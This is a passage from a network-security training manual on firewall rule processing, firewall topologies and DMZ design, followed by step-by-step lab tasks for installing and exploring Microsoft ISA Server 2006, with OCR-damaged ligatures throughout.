level source, destination, and port addresses.
Less Susceptible to TCP/IP Vulnerabilities: Application level rewalls can
inspect the entire contents of a packet to ensure that the contents are appro-
200 Tactical Perimeter Defense
priate for the target destination. This greatly improves the rewalls ability to
block spoong attacks and other TCP/IP vulnerabilities.
The deep packet inspection of an application level rewall can be a resource-
intensive to process. Therefore, most application level rewalls include stateful
inspection to optimize resource utilization.
One potential danger to application level rewalls is that savvy intruders may
attempt to defeat the deep level inspection by encrypting their packet contents
such as tunneling with SSL. This is why it is important for application level
rewalls to create a rule that denies any inbound encrypted communication unless
the connection originated from inside the trusted zone and is listed in the state
table.
Building Firewall Rules to Control Network
Communications
We have discovered that modern rewalls can control network traffic based on a
wide range of packet or application attributes contained in the layers discussed
previously. When a packet is received by the rewall, it inspects the packets
attributes that were included in the packet as it passed through the various net-
working layers. This information is then compared to rules that have been
congured for the rewall. Based on the outcome of the comparison, the commu-
nications traffic packet can be handled in any of the following manners by the
rewall.
Accept: The rewall passes the packet through the rewall to the destination
requested by the packet.
Deny: The rewall drops the packet, without passing it through the rewall.
After the rewall drops the packet, an error message is returned to the
source address.
Discard: The rewall drops the packet, but does not return an error message
to the source address. This creates the appearance that the rewall is not
even on the network, and it is often referred to as a black hole because it
does not reveal its presence by error messages.
Lesson 5: Conguring Firewalls 201
A partial list of attributes that can be examined by a rewall and used for rule set
comparison would look like this:
Source address
Destination address
Protocol
Source port
Destination port
Source service
Destination service
TTL values
Originators netblock
Destination netblock
Domain name of the source
Domain name of the destination
Application source
Application destination
Authentication
And many other attributes
Firewall rules are the heart of your rewall system. These rules build on one
another and are generally parsed in sequence. The rst rule the rewall discovers
that matches the attributes of the data packet is the rule that will be applied rst.
Most rewalls will have a conguration option that allows you to manage the
ow of how rules are parsed within a give rule set.
Ordering your rewall sets correctly is an important step in ensuring that the
rewall behaves as expected. View the following gure and look at rule number
seven (the default deny rule). This rule is the last rule in the set. If this rule was
placed anywhere but last in the list, all other rules below it would not have any
effect, because all traffic is denied by this rule. Without careful ordering of your
rules, you will nd your rewall producing unexpected results. One thing you can
count on is that a rewall will do exactly what you tell it to do. It is a wise
rewall administrator who plans his or her rules carefully and keeps them well
documented!
Figure 5-10: Example rewall rule set.
202 Tactical Perimeter Defense
Common Firewall Topologies
Firewalls can be congured in a variety of topologies to meet the needs of any
size or style of network environment. There are three standard rewall topology
congurations that are commonly used in modern networks. Each of these topolo-
gies is applicable to a specic network environment. Choosing the correct rewall
topology for your network is the rst step in successfully implementing a rewall
on your network.
We have discovered that rewalls are used to enforce access controls between
systems or network segments linked across zones with varying levels of trust. It
should not be surprising, therefore, when we examine the common rewall
topologies to nd a rewall at each location where different trust zones connect.
Perimeter Firewall: The perimeter rewall topology (also referred to as edge con-
guration, bastion host, or screened conguration) is the most common rewall
topology. This topology places a single rewall directly between the trusted and
un-trusted systems or networks.
Figure 5-11: Example of a perimeter rewall topology.
Perimeter rewalls are the simplest conguration to use when no trusted
resources need to be available to the un-trusted network. One exception would be
remote users; in this case, the rewall is often combined with VPN technology to
allow external users to securely access the internal network. This is a good choice
for a topology when you want to allow access to the Internet from your trusted
network, but do not wish to make internal resources available to users on the
Internet.
You can congure a perimeter rewall to allow access to specic internal
resources by creating rewall rules that allow outside access to only those
resources, such as an SMTP server or web server. In fact, many people do exactly
that. Be aware, however, that if the internal resource should be compromised over
the externally accessible resource port, it opens your whole network to further
attacks. If you need to make resources available to users on un-trusted networks,
the best choice is to choose one of the following DMZ congurations.
Three-Legged (DMZ) Firewall Topology: The three-legged DMZ topology is com-
monly used where you need to publish resources to an un-trusted network such as
the Internet. This topology uses a single rewall such as the perimeter topology;
however, in this conguration, the rewall has an additional network interface
that is connected to a network containing the externally available resources.
Lesson 5: Conguring Firewalls 203
Figure 5-12: Example of a three-legged (DMZ) rewall topology.
The three-legged rewall topology allows you to publish resources while still
blocking all inbound access to your internal network. In this topology, the rewall
rules are congured differently for the internal and DMZ interfaces. The internal
interface is congured to deny external access to the internal network, while the
DMZ interface is congured to allow access to specic resources in the DMZ
from the external network.
This conguration increases the security posture of your internal network by
removing the need to open any inbound ports to the internal network other than
for client return connections. An additional security benet of this topology is
that if one of the publicly accessible resources is compromised, your internal net-
work remains secure.
Chained (DMZ) Firewall Topology: Another rewall DMZ topology commonly
used where you need to publish resources to an un-trusted network such as the
Internet is the chained DMZ. This topology uses a pair of rewalls to create the
DMZ. The two rewalls sandwich the DMZ between the internal and external
networks. Since this conguration contains two rewalls and subsequently two
sets of rewall rules, it can be considerably more complex to setup. However,
when this topology is correctly congured, it brings a high level of protection to
your network.
Figure 5-13: Example of a chained (DMZ) rewall topology.
204 Tactical Perimeter Defense
This topology is commonly used where both the external network and the internal
network need to access to resources in the DMZ, and those DMZ resources also
require communication with other servers and services that reside inside the inter-
nal network.
A good example of this would be a mail server that needs to authenticate internal
users against a directory service that resides on a server in the internal network.
The mail server in this scenario has two requirements. It must be able to
exchange inbound and outbound SMTP packets with the Internet and be able to
authenticate internal users against a directory service that resides on a server in
the internal network.
Another situation where this topology would be an appropriate choice is where
you have an e-commerce site that connects to a database containing sensitive cus-
tomer information. In this scenario, you would place the front end web server in
the DMZ behind the front side rewall; then place the database server on the seg-
ment behind the backside rewall. The front side rewall rules would be
congured to only allow inbound TCP port 80 and port 443 to the web server,
while the backside rewall rules would only allow the web server to query the
backend database server, effectively isolating the database server from the
Internet.
When correctly congured, the chained DMZ rewall topology offers a high level
of threat protection from external network access, while providing ample exibil-
ity for communications between the DMZ and the internal network.
Why Would I Want a Firewall on My Network?
The Wild Frontier
The Internet is sometimes referred to as the new frontier. And like any frontier
setting, it has its share of undesirable elements. Out on the frontier, the only
safety that you can count on is the safety you create for yourself. Placing a
rewall on your network is like the old time explorers building a fort for
protection. It does not guarantee total immunity, but it provides much more safety
than a canvas tent when danger approaches.
Like the frontier, the Internet is lled with opportunity. This includes the opportu-
nity to carry out business, to learn, grow, discover, and connect with new people.
But close on the heels of frontier-style opportunity come the scavengers and
villains. Almost any day, in almost any media you care to name, you will nd a
new report about some digital danger that has reared its ugly head on the
Internet.
The net is a representation of society in all its glory and disgrace. From nuisance
hackers to serious criminals, the complete gamut of less than well-adjusted soci-
etal members can be found. In our normal lives, we install locks on our houses
and employ police forces to deter would-be vandals and thieves from taking or
damaging our property. Firewalls fulll this role on our networks. If you dont
protect it, you wont own it for long.
Lesson 5: Conguring Firewalls 205
Regulatory Compliance
The prominence of Internet dangers has even prompted legislation in many coun-
tries that places responsibilities for data protection on the organization that owns
the information. This is especially true of government, banking, and the
healthcare industries. Organizations now nd themselves with compliance respon-
sibilities for protecting sensitive data that sometimes carry stiff penalties for non-
compliance.
This has spawned a general move in most organizations towards a formal set of
computing security policies. These policies dictate how an organizations
resources must be protected and show that they are meeting regulatory
compliance. A rewall is one of the key elements in enforcing the organizations
written policy.
Public Image
A rewall can also serve to protect not only your organizations data, but also its
public image. Almost every organization has a website today. If these publicly
accessible resources are not protected and get hacked, either through defacement
or denial of service attacks, the organizations image will be tarnished in the eyes
of the website users.
This impact can, and usually does, make itself felt on the organizations bottom
lineeither through your customers going to the competition because they lost
trust in your organization as the result of website defacement or data theft or
through lost sales as the result of a denial of service attack on your e-commerce
site. Firewalls cant always prevent this, but they can mitigate the dangers down
to an acceptable level of risk.
What Can a Firewall Not Protect You From?
A rewall is a powerful tool in your security tool box, but there are certain types
of dangers that a rewall can do nothing about. For example, because the purpose
of a rewall is to control and limit inbound and outbound network communica-
tions between networks or systems of differing trust levels, it stands to reason
that it cannot protect against attacks that dont traverse your rewall. The follow-
ing is a partial list of things that a rewall cannot protect you from:
Firewalls cannot protect against internal threats: This type of threat origi-
nates from the zone of trust where the attack is targeted. This would include
such things as:
Disgruntled or unscrupulous workers. This is actually one of the great-
est dangers to any network and coincidently how the greatest number of
intrusions actually occur.
Weak password policies or other poor system administration practices.
Firewalls will not be very effective in securing something that has gap-
ing security holes in it to start with. Make sure you follow industry
standard best practices throughout your network environment.
Firewalls cannot protect against attacks that dont traverse your rewall:
Personal Modem or Wireless connections. It is worth noting that this
issue has evolved into a real danger in the era of mobile wireless
Internet access. A mobile user who attaches his or her laptop to your
trusted network and then connects to the Internet via a 3G GSM satel-
206 Tactical Perimeter Defense
lite or other wireless connection has effectively punched a hole right
through your carefully congured security measures.
Social engineering. This is a proven methodology to break into net-
works that are otherwise secured. It is simply astounding what
villainous social engineers can get a user (or even a sys admin), who is
otherwise an intelligent human being, to reveal about his or her comput-
ing environment. Your best line of defense against this type of attack is
user education.
Cannot protect against attacks on services that are allowed through your
rewall:
Allowed inbound traffc. This would include attacks on web and email
services that external access to has been permitted to. If you allow
access to your web server through the rewall, and the web server has
an un-patched vulnerability that works over port 80 (http), your rewall
cannot protect the web server from that type of attack.
Malware and browser threats. Firewalls cannot protect your network
against threats that the user brings into the network themselves. This
includes the many forms of malware such as email viruses, Trojans,
browser-based attacks, spyware, and phishing sites. Again, we are back
to defense in depth and user education as our best defense against these
types of threats.
To have the best chance at defending your network, a well-congured rewall
must be augmented by good conguration control, secure OS baselines, patch
management, anti-malware programs, sound network administration basics, and a
user education program. Defense in depth is the security-conscious administrators
motto.
Things to Consider About Firewall Implementation
Before we move on to the next topic, lets discuss a few simple concepts con-
cerning the real world implementation of a rewall in your network. If you keep
these concepts in mind when you work with an organizations rewall, you will
enjoy greater success in securing the network, while keeping management and
your users content and supportive.
Firewalls are an Enforcement Tool for Security Policies
A rewall enforces your inter-network access security policy. If you didnt have
an access security policy before you put the rewall in place, you do now. It may
not be a written policy, but effectively its still an access security policy. If you
havent made explicit decisions about what you want your inter-network access
security policy to be, you will likely wind up with less than optimal congura-
tions on your rewall, and it will certainly be more difficult for you to maintain
its effectiveness over time. In order to have an effective rewall, you really do
need a good security policyone that is well thought out, written down, and
widely agreed to and supported within your organization.
It is almost axiomatic in the security eld that if you do not have published, for-
mal, written security policies that have received full management approval and
support, implementing a rewall will max your job pain threshold. This is prima-
rily because your users (and management) will not understand why the network
doesnt work like it used to and the ill will and blame will wind up on your
door step. Before implementing the rewall, you should have created a written
Some modern application
layer rewalls capable of
deep packet inspection also
have varying levels of
intrusion detection
capabilities built in. These
rewalls can potentially
mitigate this type of risk. But
better safe than sorry. Patch,
Patch, Patch!
Some modern application
layer rewalls capable of
deep packet inspection also
have varying levels of
malware detection
capabilities built in. These
rewalls can potentially
mitigate this type of risk. But
again, better safe than sorry.
Always use anti-malware
software and keep it up-to-
date!
Lesson 5: Conguring Firewalls 207
policy that explicitly outlines your overall security goals, policies, and procedures
including your rewall conguration and rule sets. Obtaining management sup-
port and backing for the policy is critical, as they are the ones with the nal
authority and responsibility for the organizations operations and information.
A Firewall by Itself is Not a Security Solution
Firewalls can only protect networks and information from certain types of digital
dangers. They are designed to control and limit external access to resources.
Firewalls can only protect you against threats they can detect, and unfortunately
there are no magical all-seeing rewalls. Also, a rewall cannot protect against
internal attacks against your network or data. To gain maximum effect, your
rewall should be just one layer in a comprehensive defense in depth security
program. Remember that an attacker doesnt often go through security but looks
for ways to go around it! Make it difficult by having more than one layer of
defense.
Use a Deny All, Permit by Exception Approach
This is a tried and true approach to conguring rewalls safely. If you deny
everything and only allow what you know to be secure or mandatory, you will
spend much less time reconguring the rewall or responding to intrusions. New
vulnerabilities continually pop up in the digital world; the permit all, deny what
is dangerous approach means you will have a constant battle to keep up. The
permit all, deny dangerous methodology would only work if you knew every
dangerpast, present, and future. This is just not a realistic approach to security.
Enforce the Least Privilege Rule
This is a basic axiom of all forms of security, regardless of if it is physical secu-
rity; user accounts; le, share, and applications permissions; or rewall
transversal access. You should only grant users, systems, and applications the
least amount of privileges or access that they require to carry out their functions.
Be leery of anything that requires high levels of privilege or access to function.
You can only empty the vault if you have access and the keys.
Be Gracious, but Not Compliant
Enforcing security and dealing with user requests is a delicate balancing act with
a little public relations magic sprinkled in. This is especially true if you are trying
to secure a network that has been insecure before. Some people will simply not
care if what they do create security risks if it makes their life more convenient. If
you open up the rewall a little more at every users request, you will wind up
with a wide open network in the end. At the same time, if you always deny
requests, people will turn bitter. It is a simple fact of life that people who feel
they cant work with you will nd a way to work around you.
Security is always a tradeoff against convenience. It is not convenient to have to
reach into your pocket to get your house keys to unlock the house when your
arms are full of grocery bags after you arrive home from the market. However,
we tolerate this inconvenience because we value the items in our house. User
education and gracious manners when you deal with users will go a long way to
meeting both their needs and keeping the network risks at an acceptable level.
Remember, the network is there to meet the business needs of the organization,
not because the organization needs a secure data vault. You need to nd ways to
meet the users needs while controlling the risks.
208 Tactical Perimeter Defense
Firewalls Are Not Just Perimeter Protection
Last, but certainly not least, expand your view of what rewalls can be used for.
In general, we think of rewalls in the context of perimeter protection when con-
necting to external networks . However, this is a very limited view of a rewalls
usefulness in a modern networked environment. It is becoming more and more
common for organizations to employ additional rewalls within their internal net-
works (intranet) to control data ow and protect critical resources or information
from unauthorized internal access. For example, an organization might employ an
internal rewall to provide an additional layer of security for its nancial or
human resources information.
Examine the following gure and notice the network segments the internal
rewall is placed between.
Figure 5-14: Using an internal rewall to secure sensitive internal resources.
In this context, the rewalls are not only controlling access from the external net-
work, the DMZ, and the partner networks, but also from within the organizations
internal network itself. Employing rewalls in this manner can signicantly
increase the security of your sensitive data against internal attacks.
Lesson 5: Conguring Firewalls 209
Topic 5B
Configuring Microsoft ISA Server 2006
Introduction to ISA Server 2006
Microsofts Internet Security and Acceleration Server (ISA) 2006 is what
Microsoft calls its integrated edge security gateway. Microsofts security offerings
in the rewall arena have come a long way since its release of Proxy Server 2.0,
which had rewall style features. This continued development has resulted in ISA
Server 2006 being a robust and mature multilayer rewall. It has a wide range of
features and capabilities that will meet the needs of almost any network environ-
ment: from small businesses to global enterprises. ISA Server 2006 features the
following functionalities:
Internet Access Control (Proxy)
Flexible Conguration Controls Including Easy-to-use Wizards
Conguration Export/Import to XML
Customizable Protocol Denitions
Secure Application Publishing
Server Publishing
Web Publishing
SharePoint Publishing
SSL Bridging
Application Layer Filtering (Deep Packet Inspection)
Intrusion Detection Capabilities
Flood Resiliency Conguration
Forward and Reverse Web Caching
Remote User or Branch Office VPN Capability
Common Deployment Scenarios for ISA Server 2006
Networking professionals around the world have had long-standing concerns
about performance impact, operational costs, and manageability whenever they
deploy a new technology on their networks. This is especially true when you
need to deploy a rewall for security purposes. Microsoft spent considerable
research effort to discover what the real pain points are when deploying a rewall
solution. Fortunately, the ISA Server 2006 design team was the recipient of all
this research. Their efforts at making ISA Server 2006 highly deployable in the
most common scenarios is evident. They targeted their efforts to make ISA Server
2006 very straightforward to deploy in several common scenarios.
Protecting your network against external and internal Internet based threats.
Publishing content to external consumers in a secure fashion.
Securely connecting remote branch offices.
Providing secure access to remote users of the internal network.
In each one of these scenarios, ISA Server 2006 provides a robust solution with
streamlined deployment, conguration, management, and reporting.
210 Tactical Perimeter Defense
Protecting Your Network Against External and Internal
Internet-Based Threats
Organizations can use ISA Server 2006 to mitigate or eliminate damage to their
network resources from the Internet including unauthorized access and even
malware attacks by using the full-featured suite of tools in ISA Server 2006 to
inspect for and block harmful network traffic and content.
With its hybrid rewall-proxy architecture, application level deep content packet
inspection, granular security policies, comprehensive monitoring, and alerting
capabilities, ISA Server 2006 makes it easier to protect and manage your con-
nected network resources. Some of the features that enable ISA Server 2006 to
protect your network are:
Simplied Management Tools: ISA Server 2006 has a suite of management
tools that simplify conguration and ongoing administration. As rewall
tools go, these tools are relatively intuitive and have a very low learning
curve.
Multilayer deep content inspection: ISA Server 2006 has a comprehensive
set of customizable policies, customizable protocol lters, and network
topology relationship models that allow you to thoroughly inspect and con-
trol the traffic that transverses the rewall.
Flood resiliency: ISA Server 2006 now features enhanced ood resiliency
for network event handling and monitoring. This feature provides a more
robust rewall resistance to threats such as denial of service and/or distrib-
uted denial of service attacks.
Unied management and monitoring with MOM: For those organizations that
have deployed the Management Pack for Microsoft Operations Manager, ISA
Server 2006 can be integrated into your enterprise- and array-level policies.
This gives administrators the ability to easily control security and ISA access
rules throughout the organization.
Enhanced worm resiliency: ISA Server 2006 can help to mitigate the overall
damage an infected computer will have on the network. This is accom-
plished through client IP alert pooling and connection quotas that monitor
and block unusual connection patterns.
Quicker attack response times: ISA Server 2006 has a comprehensive set of
alert triggers with congurable responses. When congured, this can quickly
notify you of network threats targeted against your network.
Extensive software developers kit (SDK): The ISA Server 2006 SDK aids
third parties in the development of ISA Server 2006 add-ons. These add-ons
enrich the feature set of ISA Server 2006 by providing a wide range of addi-
tional protections such as anti-virus or custom web ltering controls.
Improved resource management: ISA Server 2006 gives you extensive log
throttling, memory consumption control, and pending DNS queries. This
improved resource management contributes to ISA Servers greater overall
performance levels.
Versions of ISA Server 2006
Before you deploy ISA Server 2006, you will need to decide which version to
purchase. ISA Server 2006 is available in two versions: Standard and Enterprise.
You should install the version that is appropriate for your network environment
and security needs. A short comparison of the two versions follows:
Lesson 5: Conguring Firewalls 211
Figure 5-15: ISA Server 2006 version comparison chart.
TASK 5B-1
Preparing for the ISA Server 2006
Setup: Lab Prerequisites Task Note: Firewalls are primarily designed
to control network traffic between network segments, so you
will need to have more than one network adapter in your com-
puter in order to congure ISA Server 2006 in the most
common rewall topologies. Since the classroom computers
have only one physical network card, we will install and con-
gure the Microsoft Loopback Adapter to represent our
internal network interface, while conguring the physical
network card as our external network interface.
1. Choose StartControl PanelAdd Hardware.
2. In the Welcome dialog box, click Next, the wizard will search for your
hardware.
3. Select Yes, I Have Already Connected The Hardware, then click Next.
4. Scroll to the bottom of the Installed Hardware list box and select Add A
New Hardware Device. Then, click Next.
5. Select Install The Hardware That I Manually Select From A List
(Advanced) option, then click Next.
6. Under Common Hardware Types select Network Adapters, and click Next.
7. Under Manufacturer, select Microsoft.
Several manufacturers such
as HP, Avantis, Whale,
Celestix, SecureGUARD, and
OSST now offer ISA Server
2006 in a rewall appliance.
This combines the power
and conguration ease of
ISA Server and the
convenience of an appliance.
212 Tactical Perimeter Defense
8. Under Network Adapter, select Microsoft Loopback Adapter.
9. Click Next twice.
10. If prompted, click OK in the Insert Disk dialog box, enter the path to the
Windows 2003 Server installation source les in the Files Needed dialog
box, and then click OK.
11. Click Finish.
12. Choose StartControl PanelNetwork ConnectionsLocal Area Con-
nection 2.
13. In the Local Area Connection 2 dialog box, click Properties.
14. In the This Connection Uses The Following Items list, select Internet Pro-
tocol (TCP/IP) and then click Properties.
15. On the General tab select Use The Following IP Address and then enter
the address from the following table that corresponds to your computer
name.
WIN-R01 - 10.16.1.1/24 WIN-L01 10.18.1.1/24
WIN-R02 - 10.16.2.1/24 WIN-L02 10.18.2.1/24
WIN-R03 - 10.16.3.1/24 WIN-L03 10.18.3.1/24
WIN-R04 - 10.16.4.1/24 WIN-L04 10.18.4.1/24
WIN-R05 - 10.16.5.1/24 WIN-L05 10.18.5.1/24
WIN-R06 - 10.16.6.1/24 WIN-L06 10.18.6.1/24
WIN-R07 - 10.16.7.1/24 WIN-L07 10.18.7.1/24
WIN-R08 - 10.16.7.1/24 WIN-L08 10.18.8.1/24
Lesson 5: Conguring Firewalls 213
16. Leave the DNS value blank and then click OK.
17. Click OK, and close the Local Area Connection 2 Properties window.
18. Choose StartControl Panel and right-click Network Connections. From
the pop-up context menu, choose Open.
19. Right-click the Local Area Connection and choose Rename.
20. Name the connection External
21. Right-click the Local Area Connection 2 choose Rename.
22. Name the connection Internal
23. Close the Network Connections window.
You have now installed the Microsoft loopback adapter and assigned it a unique
IP address. We will be using this adapter to function as our internal network
adapter for ISA Server 2006. You also renamed the two available network con-
nections so they can easily be identied as either the external or internal
networks.
ISA Server Installation Requirements
System Requirements for ISA:
Figure 5-16: ISA Server hardware requirements.
The subnet mask is 255.255.
255.0 for all these IPs.
214 Tactical Perimeter Defense
TASK 5B-2
Install Microsoft ISA Server 2006
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed the previous task. This task
requires you have the Microsoft ISA Server 2006 software
available.
1. Browse to the location of the ISA Server 2006 installation les and
double-click isaautorun.exe.
2. Click the Install ISA Server 2006 link.
3. At the Installation Wizard, click Next.
4. Read the License Agreement, select I Accept Terms In The License
Agreement and click Next.
Lesson 5: Conguring Firewalls 215
5. In the Customer Information dialog box, enter your name, company, and
license if necessary, and then click Next.
6. In the Setup Type dialog box, select the Typical radio button, then click
Next.
7. In the Internal Network dialog box, click the Add button.
8. In the Addresses dialog box, click the Add Adapter button.
9. In the Select Network Adapters dialog box, check the box next to your
Internal network card, and then click OK.
216 Tactical Perimeter Defense
10. In the Addresses dialog box, click OK.
11. In the Internal Network dialog box, click Next.
12. In the Firewall Clients dialog box, accept the default and click Next. (Do
not check the box to Allow non-encrypted Firewall Client Connections.)
13. Read the Services warning dialog box and then click Next.
14. In the Ready to Install the Program dialog box, click Install. (The Microsoft
ISA Server 2006 - Installation Wizard will start and a File Progress window
will appear. Be patient, it will take several minutes to install all the
components.)
15. In the Installation Wizard Finished dialog box, click Finish.
16. In the pop-up window, click OK. The Windows Internet Explorer window
opens with some information on how to protect ISA. Read the page and
then close the Internet Explorer window.
17. Close the Microsoft ISA Server 2006 Setup dialog. ISA Server 2006 is
now installed.
Configuring ISA Server 2006
There are ve basic steps to conguring your ISA Server 2006 Firewall. The ISA
Server Getting Started guide provides a simple path through these processes to
ensure that you can congure your ISA Server rewall with a minimum of
confusion.
The ve basic steps to congure an ISA Server 2006 rewall are:
1. Dene your ISA Server network conguration.
2. Create Firewall Policy Rules.
3. Dene how ISA Server caches web content.
4. Congure VPN access (if required).
5. Set up Monitoring on your ISA Server.
Each of these tasks has a conguration page that guides you step by step through
the various wizards and conguration pages associated with the individual tasks.
In the following tasks, you will explore the ISA Server Management Console and
congure each of these options for your ISA Server 2006 rewall.
Understanding the ISA Server Management Console
You manage your ISA Server 2006 rewall through the ISA Server Management
Console. This console has three basic areas that you can use to navigate and con-
gure ISA Server 2006:
Console Tree (left pane)
Details pane (center pane)
Tasks pane (right pane)
Lesson 5: Conguring Firewalls 217
Figure 5-17: The ISA Server Management Console panes.
In the following task, you will explore the ISA Server Management Console and
familiarize yourself with its functions and behaviors. The tool is very intuitive,
but it does have a lot of moving parts, so the more time you spend getting com-
fortable with it, the more efficient you will become at conguring ISA Server.
TASK 5B-3
Exploring the Microsoft ISA Server 2006 Interface
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed task 3B-2.
1. Choose StartAll ProgramsMicrosoft ISA ServerISA Server
Management.
2. Notice that the ISA Server Management console is divided into three
panes:
The left hand pane is your Console Tree pane. This pane contains a
short list of navigable containers. The containers in this pane logically
group related management or conguration settings.
The center pane is your Details pane. For each container in the Console
Tree pane, the Details pane will contain information related to the con-
guration container selected in the Console Tree. Depending on the
conguration container selected, the Details pane may have multiple
tabs of information.
The right pane is your Tasks pane. The Tasks pane contains two tabs
the Tasks tab has a list of relevant tasks that can be performed for the
selected container in the Tree pane. If the conguration container
218 Tactical Perimeter Defense
selected in the Tasks pane shows multiple tabs of information in the
Details pane, the Tasks tab is contextual, that is, it will contain Tasks
that can be performed for any selected tab in the Details pane of a par-
ticular conguration container. In addition, the Tasks pane also contains
a Help tab with context-sensitive help for the selected Details pane tab.
3. Notice that the Details pane defaults to the Welcome information. In this
section, you can nd links to guides on Getting Started, Securing your ISA
Server, and Internet Websites with ISA Server Information.
4. In the Console Tree pane, expand the container with your server name by
clicking the + symbol.
5. In the Console Tree pane, expand the Conguration container by clicking
the + symbol.
You have now exposed the whole conguration container chain for a
standalone ISA Server 2006 rewall. The Console Tree can/will contain
other items if the ISA Server is part of an ISA Array in a domain.
6. In the Console pane, select the WIN-R01 conguration container.
7. Notice that this places the Getting Started information in the Details pane.
This lists out the ve conguration steps for ISA Server. Briey read down
the list of items in the Details pane.
8. In the Details pane, click the Dene Your ISA Server Network Congura-
tion link.
9. Notice that the selected container in the Console Tree pane changed to the
Networks container.
The three panes found in the ISA Server Management console are
linked. Clicking a link in any of the panes will take you to the correct
conguration container for the property you are trying to congure.
10. Explore the four tabs in the Details pane of the Networks container.
Lesson 5: Conguring Firewalls 219
11. Notice that as you move between tabs in the Details pane, the Tasks pane
changes to show contextually relevant links for each tab.
12. On the middle of the vertical divider between the Details pane and the Task
pane, click the arrow icon. Notice that the Tasks pane collapses to create a
larger viewable area for the Details pane.
13. Click the arrow icon again. The Tasks pane expands again to allow access
to the tasks listed for the Details pane tab.
14. In the Console Tree pane, select the Monitoring container.
15. Notice that this container has seven tabs in the Details pane.
16. In the Details pane, select the Services tab.
17. On the Services tab, select the Microsoft Firewall item.
18. On the Task pane under Services Tasks, click the Stop Selected Service
link.
19. Notice that after the service stops, the Tasks link changes context from Stop
to Start.
20. Restart the service after it stops by clicking the Start Selected Service
link.
21. In the Details pane, after the service restarts, click the Alerts tab.
22. On the Tasks pane, click the Refresh now link.
23. Notice that the action of starting and stopping the service generated an alert
entry.
24. Click the Dashboard tab.
220 Tactical Perimeter Defense
25. Notice that Alerts is one of the items on the Dashboard. The Dashboard
gives you a quick overview of the current state of activity on your ISA
Server.
26. In the Console Tree pane, select the Firewall Policy container.
27. Notice in the Details pane that one rule, the Default Rule of deny all traf-
c for all networks, exists.
ISA Server installs only this default Deny All rule during installation. To
allow traffic to pass through the ISA Server, you must congure rules to per-
mit it to pass.
28. Notice on the Tasks pane for the Firewall Policy container that there is a
long list of tasks that can be performed.
29. Explore the list of tasks in the Firewall Policy Tasks section of the Task
pane.
30. Notice that these tasks are broken down into four categories:
Firewall Policy Tasks
Policy Editing Tasks
System Policy Tasks
Related Items
Again, the Tasks pane is context sensitive to the container selected in the
Console Tree pane and the tab selected in the Details pane. If you are having
trouble locating a task, be sure you have selected the right container and
Details tab.
31. Notice that the Tasks pane now has a third tab called Toolbox.
32. Select the Toolbox tab in the Tasks pane.
33. Notice that the Toolbox tab has ve expandable sections.
Lesson 5: Conguring Firewalls 221
34. Browse through the Toolbox tab sections. Be sure to expand and explore a
few sub-containers under the various sections also.
222 Tactical Perimeter Defense
35. Explore the remaining Console Tree pane conguration containers and
their associated Details and Tasks panes.
36. After you have explored a bit, close the ISA Server 2006 Management
console window.
Exporting/Importing ISA Server 2006 Configurations
as XML Files
One of the features that makes ISA Server 2006 easy to manage is the ability of
ISA Server to export the current conguration as an XML le. It is now simpler
than ever to back up and restore your rewall conguration. To return to that
conguration, you simply import the XML conguration le back into ISA
Server. Exporting your working conguration before making any adjustments to
the rewall conguration is always a good idea, especially when the rewall
policy is complex with many layers of rules applied. This will ensure that you
can return to the last known good conguration with a minimum of hassle or
down time.
TASK 5B-4
Exporting the Default Configuration
Setup: You must be logged on to Windows 2003 Server as an admin-
istrator and have completed task 3B-2.
1. Choose StartAll ProgramsMicrosoft ISA ServerISA Server
Management.
2. In the Console Tree pane, select the container with your ISA server name.
3. On the Tasks tab, click the Export (Backup) this ISA Server Congura-
tion link.
4. In the Export Wizard dialog box, click Next.
5. In the Export Preferences dialog box, select Export User Permissions. We
have no condential information, such as user passwords and certicates, to
export so we will leave that check box unchecked.
6. Click Next.
7. In the Save The Data To This File eld, enter C:\originalcfg.xml and click
Next.
8. Click Finish.
9. After the le nishes exporting, click OK.
10. Close the ISA Server 2006 Management Console.
This conguration area of the
ISA Server Management
console is where you can
create and manage all of the
various items that can be
used in rewall policy rule
congurations. A strong
familiarity with these items
will greatly benet you when
you create custom rewall
policy rules for your network.
We will return to this area
later when we create custom
rules.
Right-clicking any item in a
container in the toolbox will
give you a context menu
listing available actions that
can be taken on that object.
Be sure to cancel out of any
dialog boxes you may open
and discard any changes to
the conguration. This is
important so that your
rewall will behave as
expected in the remaining
ISA task exercises.
Lesson 5: Conguring Firewalls 223
We now have the ability to return to our default conguration if we accidentally
miscongure our rewall. Adding the exported ISA Server conguration XML
les to your regular backups would be a good conguration management tool and
policy.
ISA Server 2006 Firewall Policies
ISA Server 2006 manages network access through the rewall using layered
rewall policies. These rewall policies can contain a set of access rules, publish-
ing rules, and network rules. Each type of rule in a policy controls a different
form of access across the rewall. These rules contained within an ISA Server
rewall policy determine how and what network traffic can access resources
through the rewall.
Access Rules
In ISA Server 2006 (like most other rewalls), the access rules are built from the
following building blocks:
Rule Name
Rule Action (Allow, Deny)
Protocol and Port
Traffic Source
Traffic Destination
User Sets
Content Groups
The parameters specied during the rules construction will create the constraint
set that the rule set will enforce through the rewall policy of the ISA Server that
the rule was created on. A best practice is to evaluate, dene, and document each
rule before you implement it in ISA Server. This will ensure you get the expected
results by applying the rule. Some rewall administrators nd it helpful to dia-
gram the rule and include the diagram with the rule documentation.
ISA Server has three basic types of rules:
Access rules: In ISA Server, an access rule controls what network traffic
from the internal network is allowed to access the external network. Access
rules can apply to all traffic, to only a selected set of protocols, or to all traf-
c except a selected set of protocols. The same thing applies to source,
destination, or user sets. A rule can apply to all, only a selected subset, or all
but a selected subset.
Publishing rules: ISA Server denes publishing rules as rules that control
access requests from the external network for internal resources. This type of
rule is applied to a web server that you want to provide public access to or
to an SMTP server that needs to accept inbound mail delivery. In actuality,
these are simply access rules applied to inbound traffic as opposed to out-
bound traffic. They can apply to the full set of rule building blocks or a
selected subset just like access rules.
Network rules: ISA Server network rules are built by dening the traffic
source, traffic destination, and the network relationship (how the traffic is
handled, for example, NAT or Routed). Network rules can be combined with
access or publishing rules to provide granular control over the traffic that
transverses the ISA Server rewall.
224 Tactical Perimeter Defense
Processing Firewall Policies
ISA Server deals with access requests in two directions: outgoing requests and
incoming requests. As ISA Server receives a request and it processes the informa-
tion contained in the packet and compares it against the rewall policy that
contains the congured rule set.
Outgoing Requests
The process of access control for outgoing requests looks like this:
ISA Server rst checks any dened network rules and veries that the two
networks are connected. If a common connection between the source and
destination network exists, ISA Server will then process the access policy
rule set. If no connection is dened in the network rules, the packet is
dropped.
ISA Server now parses the access rules in the order that they are congured.
